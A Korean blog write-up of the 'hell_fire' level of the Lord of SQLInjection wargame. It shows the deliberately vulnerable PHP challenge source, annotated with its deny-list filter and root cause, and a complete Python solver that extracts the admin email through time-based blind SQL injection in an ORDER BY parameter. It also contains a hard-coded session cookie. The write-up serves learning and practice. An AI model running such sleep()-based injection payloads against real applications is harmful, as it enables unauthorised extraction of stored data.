[ LOS ] Lord of SQLInjection 23번 풀이(hell_fire)

sangjun

·

2022. 1. 12. 12:51


 

문제소스

id	email	score
query : select id,email,score from prob_hell_fire where 1 order by
<?php
  // Challenge source for "hell_fire": lists rows of prob_hell_fire in a
  // caller-chosen order, then marks the level solved when the submitted
  // email equals the admin row's email.
  // login_chk(), dbconnect() and solve() are not defined on this page;
  // presumably they come from config.php.
  include "./config.php";
  login_chk();
  $db = dbconnect();
  // Deny-list filter: rejects the request when `order` contains "prob", "_",
  // ".", "proc" or "union" (case-insensitive). Every other character and
  // keyword passes through, so this is not a structural defence.
  if(preg_match('/prob|_|\.|proc|union/i', $_GET[order])) exit("No Hack ~_~");
  // Root cause: `order` is interpolated straight into the ORDER BY clause.
  // Bound parameters cannot stand in for a column name or sort expression,
  // so the usual fix is to map the request value onto a fixed allowlist of
  // column names (for example id / email / score) and reject anything else.
  $query = "select id,email,score from prob_hell_fire where 1 order by {$_GET[order]}";
  echo "<table border=1><tr><th>id</th><th>email</th><th>score</th>";
  $rows = mysqli_query($db,$query);
  while(($result = mysqli_fetch_array($rows))){
    // The admin email is masked only in the rendered table; the value is
    // still read by the query above, so anything the ORDER BY expression
    // can observe (row order, response time) remains a side channel.
    if($result['id'] == "admin") $result['email'] = "**************";
    // Row values are written into the HTML without escaping.
    echo "<tr><td>{$result[id]}</td><td>{$result[email]}</td><td>{$result[score]}</td></tr>";
  }
  // The query string, including the raw `order` value, is echoed back
  // without HTML escaping (htmlspecialchars() would be the usual fix).
  echo "</table><hr>query : <strong>{$query}</strong><hr>";

  // Second stage: `email` is escaped with addslashes() and placed inside a
  // quoted string literal.
  $_GET[email] = addslashes($_GET[email]);
  $query = "select email from prob_hell_fire where id='admin' and email='{$_GET[email]}'";
  // `@` suppresses any warning raised when the query fails.
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  // Solved only when a row came back and its email is strictly equal to the
  // (already escaped) submitted value.
  if(($result['email']) && ($result['email'] === $_GET['email'])) solve("hell_fire");
  // Prints this file's own source, which is why the challenge text is visible.
  highlight_file(__FILE__);
?>

문제 분석 및 페이로드

1. order 파라미터가 ORDER BY 절에 그대로 삽입되므로 time based SQL injection이 가능하다.

2. 스크립트 결과는 adbin_secure_email~~로 나왔는데, admin으로 고쳐 줘야 클리어됐다. time based 방식은 네트워크를 거친 응답 시간으로 참/거짓을 판정하므로, 네트워크가 느릴 때 거짓인 요청도 1초를 넘겨 참으로 잘못 기록된 것일 수 있다(후보 문자열에서 b가 m보다 먼저 시도된다).

# Solver for the LOS "hell_fire" wargame level: recovers the admin row's email
# one character at a time through a time-based side channel in the `order`
# parameter. Nothing is read from the response body; the only signal is how
# long each request takes.
# (The original header comment said "prints Hello admin when true", which does
# not match this script.)
import requests
import string
import time
from pwn import *
URL="https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php"
# Candidate characters, tried in this order: digits, lowercase, uppercase,
# punctuation.
brute=string.digits+string.ascii_letters+string.punctuation
# NOTE(review): a session identifier is hard-coded and published with the
# write-up. Load it from the environment instead and treat the posted value as
# compromised.
cookies={"PHPSESSID":"kogf8srvhks2phbp9kdndnk5ar"}
passwd=""
print(brute)
# Stays -1 when no length in 0..99 produces a delayed response; the second
# loop then runs zero times and the script prints an empty result.
length=-1
# Step 1: find the length of the admin email.
for i in range(100):
    # Author's note (translated): without the id='admin' condition the guest
    # row (length 4) also matches and the result comes out wrong. The note
    # says "pw"; the column queried here is email.
    query=f"""?order=if(id='admin' and length(email)={i},sleep(1),1)"""
    start=time.time()
    response=requests.get(URL+query,cookies=cookies)
    end=time.time()-start
    # A request that takes longer than 1 s is read as "condition true". Any
    # other cause of latency crosses the same threshold, so one slow response
    # is enough to record a wrong value.
    if end>1:
        length=i
        break

print(f"pass length is {length}")
# Step 2: recover the email one position at a time (mid() is 1-indexed).
for i in range(1,length+1):
    for ch in brute:
        start=time.time()
        # The candidate is compared by character code, so the character itself
        # never appears in the request.
        query=f"""?order=if(id='admin' and ord(mid(email,{i},1))={ord(ch)},sleep(1),1)"""
        response=requests.get(URL+query,cookies=cookies)
        end=time.time()-start
        print(query)
        # Same single-sample threshold as above; the first candidate whose
        # request is slow wins, whether or not it is the real character.
        # If no candidate is slow, nothing is appended and later positions
        # shift left without any warning.
        if end>1:
            passwd+=ch
            # `log` is provided by the star import from pwn.
            log.critical(f"{ch}")
            break

print(f"passwd is {passwd}")
